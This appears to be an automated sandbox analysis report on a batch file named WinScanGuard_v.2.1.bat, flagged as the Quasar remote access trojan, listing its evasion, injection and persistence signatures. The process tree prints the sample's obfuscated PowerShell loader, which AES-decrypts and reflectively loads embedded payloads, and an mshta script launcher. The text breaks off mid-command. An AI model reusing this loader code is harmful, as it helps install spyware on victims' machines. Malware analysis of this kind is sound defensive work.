Analysis Report
WinScanGuard_v.2.1.bat
Overview
General Information
Detection
Quasar
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Quasar RAT
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Costura Assembly Loader
Renames powershell.exe to bypass HIPS
Powershell is started from unusual location (likely to bypass HIPS)
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Deletes itself after installation
Found large BAT file
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Powershell connects to network
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Suspicious powershell command line found
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Classification
- System is w10x64
- cmd.exe (PID: 6772 cmdline:
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WinScanGuard_v.2.1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6800 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WinScanGuard_v.2.1.bat.exe (PID: 7128 cmdline:
"WinScanGu ard_v.2.1. bat.exe" - noprofile -windowsty le hidden -ep bypass -command function o LSgt($QHQw Z){ $FhDgh =[System.S ecurity.Cr yptography .Aes]::Cre ate(); $Fh Dgh.Mode=[ System.Sec urity.Cryp tography.C ipherMode] ::CBC; $Fh Dgh.Paddin g=[System. Security.C ryptograph y.PaddingM ode]::PKCS 7; $FhDgh. Key=[Syste m.Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ('ONJSi5Fj Jzv4AOEMBv ugvr4ituUV mgVNRnjeJy rP0WQ='); $FhDgh.IV= [System.Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')('CL QNYwl0vsdf D4X+5YKrxQ =='); $SpF lB=$FhDgh. CreateDecr yptor(); $ return_var =$SpFlB.Tr ansformFin alBlock($Q HQwZ, 0, $ QHQwZ.Leng th); $SpFl B.Dispose( ); $FhDgh. Dispose(); $return_v ar;}functi on rnHmS($ QHQwZ){ $W xVgK=New-O bject Syst em.IO.Memo ryStream(, $QHQwZ); $ bpCBe=New- Object Sys tem.IO.Mem oryStream; $coUVU=Ne w-Object S ystem.IO.C ompression .GZipStrea m($WxVgK, [IO.Compre ssion.Comp ressionMod e]::Decomp ress); $co UVU.CopyTo ($bpCBe); $coUVU.Dis pose(); $W xVgK.Dispo se(); $bpC Be.Dispose (); $bpCBe .ToArray() ;}function ZAtIe($QH QwZ,$cjUqy ){ $oSPmD= [System.Re flection.A ssembly]:: ('daoL'[-1 ..-4] -joi n '')([byt e[]]$QHQwZ ); $xWTDt= $oSPmD.Ent ryPoint; $ xWTDt.Invo ke($null, $cjUqy);}$ YlWDR=[Sys tem.IO.Fil e]::('txeT llAdaeR'[- 1..-11] -j oin '')('C :\Users\us er\Desktop \WinScanGu ard_v.2.1. 
bat').Spli t([Environ ment]::New Line);fore ach ($XUIQ g in $YlWD R) { if ($ XUIQg.Star tsWith('SE ROXEN')) { $sOgSv=$X UIQg.Subst ring(7); b reak; }}$Z ErMU=[stri ng[]]$sOgS v.Split('\ ');$tzgBc= rnHmS (oLS gt ([Conve rt]::('gni rtS46esaBm orF'[-1..- 16] -join '')($ZErMU [0])));$Tt Dxt=rnHmS (oLSgt ([C onvert]::( 'gnirtS46e saBmorF'[- 1..-16] -j oin '')($Z ErMU[1]))) ;ZAtIe $Tt Dxt (,[str ing[]] ('' , 'idTznCC sreqaEEjvu wzuTuitglI VMFHEuLsTn nuHsLwyMmx aqK', 'LkI zMJCsatThE deYOSSAwnZ MOfyqejPcY tnoxQiuObL PDohIJN')) ;ZAtIe $tz gBc (,[str ing[]] ('' , 'idTznCC sreqaEEjvu wzuTuitglI VMFHEuLsTn nuHsLwyMmx aqK', 'LkI zMJCsatThE deYOSSAwnZ MOfyqejPcY tnoxQiuObL PDohIJN')) ; MD5: 04029E121A0CFA5991749937DD22A1D9) - dllhost.exe (PID: 4916 cmdline:
C:\Windows\System32\dllhost.exe /Processid:{17980c38-011a-4e2a-a8da-a3b9e80db269} MD5: 08EB78E5BE019DF044C26B14703BD1FA) - dllhost.exe (PID: 7132 cmdline:
C:\Windows\SysWOW64\dllhost.exe /Processid:{6ee5d1df-df32-414a-8053-43a03a04def5} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C) - WerFault.exe (PID: 1440 cmdline:
C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 144 MD5: C31336C1EFC2CCB44B4326EA793040F2) - dllhost.exe (PID: 1228 cmdline:
C:\Windows\System32\dllhost.exe /Processid:{b60ad232-6d40-4822-9220-52a4d3050cb3} MD5: 08EB78E5BE019DF044C26B14703BD1FA) - dllhost.exe (PID: 5252 cmdline:
C:\Windows\SysWOW64\dllhost.exe /Processid:{603825cb-58d6-4ab4-99a0-2fdb5cd309d6} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
- $sxr-mshta.exe (PID: 344 cmdline:
C:\Windows \$sxr-msht a.exe "jav ascript:do cument['wr '+'it'+'e' ]('<h'+'tm '+'l>'+'<s '+'cr'+'ip '+'t\x20'+ 'la'+'ng'+ 'ua'+'ge'+ '=\x22'+'V B'+'Sc'+'r i'+'pt'+'\ x22>'+'Se' +'t\x20'+' ob'+'jS'+' he'+'ll'+' \x20='+'\x 20C'+'re'+ 'at'+'eO'+ 'bj'+'ec'+ 't('+'\x22 W'+'Sc'+'r i'+'pt'+'. S'+'he'+'l l'+'\x22)' +'\x20:'+' \x20o'+'bj '+'Sh'+'el '+'l.'+'Ru '+'n\x20'+ '\x22C:\\W indows\\$s xr-c'+'md' +'.e'+'xe' +'\x20/'+' c %'+'$sxr -bWTLJBKbo gHiYUerhoA r4312:&#<? =%'+'\x22, '+'\x200'+ ',\x20'+'T r'+'ue'+'< /'+'sc'+'r i'+'pt'+'> <'+'/h'+'t m'+'l>');c lose();" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - $sxr-cmd.exe (PID: 5820 cmdline:
"C:\Windows\$sxr-cmd.exe" /c %$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 792 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - $sxr-powershell.exe (PID: 5088 cmdline:
C:\Windows \$sxr-powe rshell.exe -NoLogo - NoProfile -Nonintera ctive -Win dowStyle h idden -Exe cutionPoli cy bypass -Command f unction ZX owG($YGfCS ){ $HJBVM= [System.Se curity.Cry ptography. Aes]::Crea te(); $HJB VM.Mode=[S ystem.Secu rity.Crypt ography.Ci pherMode]: :CBC; $HJB VM.Padding =[System.S ecurity.Cr yptography .PaddingMo de]::PKCS7 ; $HJBVM.K ey=[System .Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( 'jR/ER/S13 sxmxzdcDQ4 cx+zLfjuBr /t1zOyGZlv i3Nc='); $ HJBVM.IV=[ System.Con vert]::('g nirtS46esa BmorF'[-1. .-16] -joi n '')('RiG EPzaIqqVKt P3vMKz42w= ='); $SHNY R=$HJBVM.( 'rotpyrceD etaerC'[-1 ..-15] -jo in '')(); $ptoRz=$SH NYR.('kcol BlaniFmrof snarT'[-1. .-19] -joi n '')($YGf CS, 0, $YG fCS.Length ); $SHNYR. Dispose(); $HJBVM.Di spose(); $ ptoRz;}fun ction Miaj R($YGfCS){ $VHZiJ=Ne w-Object S ystem.IO.M emoryStrea m(,$YGfCS) ; $MKYCr=N ew-Object System.IO. MemoryStre am; $pphYy =New-Objec t System.I O.Compress ion.GZipSt ream($VHZi J, [IO.Com pression.C ompression Mode]::Dec ompress); $pphYy.Cop yTo($MKYCr ); $pphYy. Dispose(); $VHZiJ.Di spose(); $ MKYCr.Disp ose(); $MK YCr.ToArra y();}funct ion DEttm( $YGfCS,$Zt wIE){ $mZo lj=[System .Reflectio n.Assembly ]::Load([b yte[]]$YGf CS); $lOFy P=$mZolj.E ntryPoint; $lOFyP.In voke($null , $ZtwIE); }$HJBVM1 = New-Objec t System.S ecurity.Cr yptography .AesManage d;$HJBVM1. Mode = [Sy stem.Secur ity.Crypto graphy.Cip herMode]:: CBC;$HJBVM 1.Padding = [System. Security.C ryptograph y.PaddingM ode]::PKCS 7;$HJBVM1. 
Key = [Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('jR/ER/ S13sxmxzdc DQ4cx+zLfj uBr/t1zOyG Zlvi3Nc=') ;$HJBVM1.I V = [Syste m.Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ('RiGEPzaI qqVKtP3vMK z42w==');$ GhtEl = $H JBVM1.('ro tpyrceDeta erC'[-1..- 15] -join '')();$tSR UF = [Syst em.Convert ]::('gnirt S46esaBmor F'[-1..-16 ] -join '' )('/drqfgt KhdXyibTYP 3tLyQ=='); $tSRUF = $ GhtEl.('kc olBlaniFmr ofsnarT'[- 1..-19] -j oin '')($t SRUF, 0, $ tSRUF.Leng th);$tSRUF = [System .Text.Enco ding]::('8 FTU'[-1..- 4] -join ' ').('gnirt SteG'[-1.. -9] -join '')($tSRUF );$tbgVF = [System.C onvert]::( 'gnirtS46e saBmorF'[- 1..-16] -j oin '')('u YhEUY/+Hnw QeclFyB1FD UqtQym+nHV dwwfjEKKh6 LU=');$tbg VF = $GhtE l.('kcolBl aniFmrofsn arT'[-1..- 19] -join '')($tbgVF , 0, $tbgV F.Length); $tbgVF = [ System.Tex t.Encoding ]::('8FTU' [-1..-4] - join '').( 'gnirtSteG '[-1..-9] -join '')( $tbgVF);$m jWsq = [Sy stem.Conve rt]::('gni rtS46esaBm orF'[-1..- 16] -join '')('v2S4N wnXvXtvXwh esSwNIQ==' );$mjWsq = $GhtEl.(' kcolBlaniF mrofsnarT' [-1..-19] -join '')( $mjWsq, 0, $mjWsq.Le ngth);$mjW sq = [Syst em.Text.En coding]::( '8FTU'[-1. .-4] -join '').('gni